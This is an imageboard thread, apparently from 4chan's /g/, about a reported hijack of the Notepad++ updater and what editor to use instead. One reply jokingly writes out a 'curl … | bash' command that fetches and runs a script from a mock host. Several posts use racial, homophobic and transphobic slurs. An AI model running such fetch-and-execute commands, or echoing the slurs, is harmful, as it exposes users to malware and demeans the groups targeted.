>gets compromisedwhat the fuck am i supposed to use now
>>107674097holy shit scoop saved me againalso no outbound connections from npp since last update christ
>>107674097>updatersWhat decade is it? Use package managers
vim
emacs
>>107674205>What decade is it?the worst one
>>107674097What are you talking about
Waow!! I sure do hope no one exploited this vulnerability on my machine!! :DDDddd
>>107674097You're literally retarded if you always update instantly and don't lag behind on purpose.
>>107674205Windows doesn't have package managers by default they download executables from random websites and run them lol
>>107674307but the security updates??
>>107674327>they download executables from random websites and run thembut enough about Linux users
>>107674097vim.>but muh woke uganda kidsdon't care. teaching a population to improve their own infrastructure is based.
>>107674330I'm talking about you, not your PE. You're a high risk target? And if you're retarded, it won't make a difference anyways.
>>107674379Uganda has graced us with hilarious shit like that "why are you gae" and "they eat da poopoo" video so they fine by my book
>>107674371uhh it's opensores, check it yourself
>>107674327winget is built-in unless LTSC in which case one script installs it. But it does download from official source instead of having it's own repo maintained by someone else which is usually mostly a good thing as you don't have many system-wide dependencies.>>107674205>>107674307NPP updater doesn't even push updates immediately but after some delay so unless someone updates manually there should be no problem.
>>107674438>"why are you gae"the paternalistic leftists performatively reassuring each other in the comments about how the angelic black man could not possibly be homophobic is one of my favourite things about that video
>>107674371>AURyeah point stands
>>107674451Not always, you can put proprietary stuff in there in which case the whole "build" process is literally just downloading and unpacking.I'd say it's a good thing but it's not checked so links can point to whatever.
>>107674327It does. Again, what decade is it?
>>107674097There is only one notepad you should be using
>>107674097>Note on Portable Versions: The portable (.zip or .7z) versions of Notepad++ typically do not include the auto-updater. Users of these versions must manually download new files to upgrade.
It's a bad vulnerability, but it's unlikely you'd get compromised.
>>107674451>it's opensoresXZ Utils + you could say the same thing about open-source Windows programs that people blindly download from GitHub. I'll consneed that Linux package managers are probably still safer since the big distros' repos have so many eyes on them, but I will never understand why they're worshipped as if they're magically immune to exploits like this
>>107674097W11 Notepad does everything Notepad++ did, and yes, you can remove CoPilot from it, yawn.VIM/Emacs also exists.
It says I have 8.8.8 installed but the website says 8.8.9 what's going on here?
I have switched to W11 notepad, thanks guys. It feels a bit choppy but meh. At least it has tabs and dark mode which were massive features the old notepad lacked. Considered Sublime but pretty sure that thing likes to nag you about buying a license.
Geany
I installed the portable version 5 years ago and there was never a reason for me to update it.
>>107674327curl -fsS trustmebro.kgb | bash -s notstealingyourcryptowallet
>>107674327it's only people actually too retarded to use Windows that download from "random" websites
>>107674371But you don't mind downloading from GitHub right?
>>107675195Sure mate
>>107674515Let me guess, pen and paper?

>>107674097pirated sublime
>>107674515The one Notepad Microsoft turned into CopilotPad?
>>107674097Nigger++ the political software nobody asked politics from. Im surprised we don't have troons in the installer yet.
>all this talk and not a single link about what actually happenedLet's see, is it real or is it schizos talking out of their ass as usual...
>>107675637just read the npp website
>>107675410The website says that a malicious actor between you and the NPP update servers was able to intercept your traffic and rather than serving a real update could serve malware instead. An update was released to prevent this.
>>107674097vim if you're saneor emacs, but emacs is so bloated i'm not sure if it has less CVEs than NP++
>>107675410After googling, through some means (malicious DNS server?), the built-in updater can be redirected to a fake update containing malware. As far as I can tell the new update introduces signing across the board to verify authenticity of updates.Seems like instances of infection would be very rare.
>notepad fucking plus plus on windowstime to move on to some actual technology
>>107675743>An update was released to prevent this.b-but how do I download it
>>107675781From a trusted connection I guess
>>107675781Same way as any other update.Download it directly from the website instead of using the built-in updater if you want to make sure it's 100% safe.
>>107674097>he doesn't use sublimetextlol
>>107674379I support the based ugandan kids, fuck notepad++ retarded ukranian niggers
i dont get it, is v8.8.7 safe?
>>107674097This is why I use Kate.
>>107675867Just download 8.8.9 and you'll be safe
this is the worst breach in /g/ history since ccleaner
>>107675894>i successfully hidden the malware in 8.8.9, go ahead and install itthat's not what i asked
>>107675920Yeah well find the answer on your own then and stop being annoying with your retarded questions, we're not your servants
